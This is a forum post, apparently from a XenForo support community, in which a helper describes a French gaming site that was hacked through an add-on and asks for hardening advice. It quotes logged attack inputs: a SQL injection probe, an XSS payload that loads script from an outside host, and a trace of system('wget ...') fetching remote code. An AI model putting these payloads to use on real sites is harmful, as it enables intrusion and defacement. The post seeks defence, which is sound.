Hi, I am helping another user on XF here (that's french and doesn't know English well) and boy, his website is getting hit hard by hackers.
To me with my limited knowledge of the topic, they've found an exploit by an addon that isn't supported here and who's been blocked from selling addons. They've SQL inject to deface.
They've have backups but these backups contain shells that allows the hackers to continue hacking the site:
The above log happened after removing the first addon.
So it looks like with above listed addons, and what another developer knows as ... cookie exploit?, They're gaining access pretty easily.
So before we try to find all of these files that the hackers uploaded (or can we call them no-life kids?), what are steps to take from stopping this altogether?
Xenforo Version: 1.5.16a
Host: 1&1
PHP: 7.0
To me with my limited knowledge of the topic, they've found an exploit by an addon that isn't supported here and who's been blocked from selling addons. They've SQL inject to deface.
array (3) { ["url"] => string (178) "https://virtual-gaming.fr/members/nunox92.594/recent-content?_xfNoRedirect=-1"%20OR%202%2b769-769-1=0% 2b0% 2b0% 2b1% 20 -% 20 & _xfRequestUri = / members / nunox92.594 / json = & _ xfResponseType " ["_GET"] => array (3) { ["_xfNoRedirect"] => string (30) "-1" OR 2 + 769-769-1 = 0 + 0 + 0 + 1 - " ["_xfRequestUri"] => string (21) "/members/nunox92.594/" ["_xfResponseType"] => string (4) "json" } ["_POST"] => array (0) { } }
# 0 [internal function]: XenForo_Application :: handlePhpError (2, 'system (): Unabl ...', '/ homepages / 7 / d6 ...', 13, Array) # 1 /homespages/7/d675201067/htdocs/www/library/VirtualGaming/ProfilCustom/ControllerPublic/Custom.php(13): system ('wget https: // cd ...') # 2 /homespages/7/d675201067/htdocs/www/library/XenForo/FrontController.php(369): VirtualGaming_ProfilCustom_ControllerPublic_Custom-> actionCustomProfile () # 3 /homepages/7/d675201067/htdocs/www/library/XenForo/FrontController.php(152): XenForo_FrontController-> dispatch (Object (XenForo_RouteMatch)) # 4 /homepages/7/d675201067/htdocs/www/index.php(13): XenForo_FrontController-> run () # 5 {main}
["url"] => string (358) "https://virtual-gaming.fr/members/nunox92.594/recent-content?_xfNoRedirect=1&_xfRequestUri=/members/nunox92.594/&_xfResponseType=json </ script> <svg / onload = '% 2b / "/% 2b / onmouseover = 1 / 2b% (s = document.createElement (/script/.source) 2cs.src% = (/% 2c / 2b% / bxss.me% 5c / s = 002 626% 3FU% 26r% 26h = 1024-5795 = 1024-9115a-2 26% /). slice (2)% 2cdocument.documentElement.appendChild (s)) // '> "
They've have backups but these backups contain shells that allows the hackers to continue hacking the site:
# 0 [internal function]: XenForo_Application :: handlePhpError (2, 'system (): Unabl ...', '/ homepages / 7 / d6 ...', 13, Array)
# 1 /homespages/7/d675201067/htdocs/www/library/VirtualGaming/ProfilCustom/ControllerPublic/Custom.php(13): system ('wget https: // cd ...')
# 2 /homespages/7/d675201067/htdocs/www/library/XenForo/FrontController.php(369): VirtualGaming_ProfilCustom_ControllerPublic_Custom-> actionCustomProfile ()
# 3 /homepages/7/d675201067/htdocs/www/library/XenForo/FrontController.php(152): XenForo_FrontController-> dispatch (Object (XenForo_RouteMatch))
# 4 /homepages/7/d675201067/htdocs/www/index.php(13): XenForo_FrontController-> run ()
# 5 {main}
The above log happened after removing the first addon.
So it looks like with above listed addons, and what another developer knows as ... cookie exploit?, They're gaining access pretty easily.
So before we try to find all of these files that the hackers uploaded (or can we call them no-life kids?), what are steps to take from stopping this altogether?
- How to stop php from executing files and removing directories
- Stop any future XSS/SQL exploits if possible
- What would be the proper file permissions for the server?
- Other developer suggests that the addons listed in the above code are clear and isn't a reason for the exploits,but I have to disagree. Who is right?
Xenforo Version: 1.5.16a
Host: 1&1
PHP: 7.0
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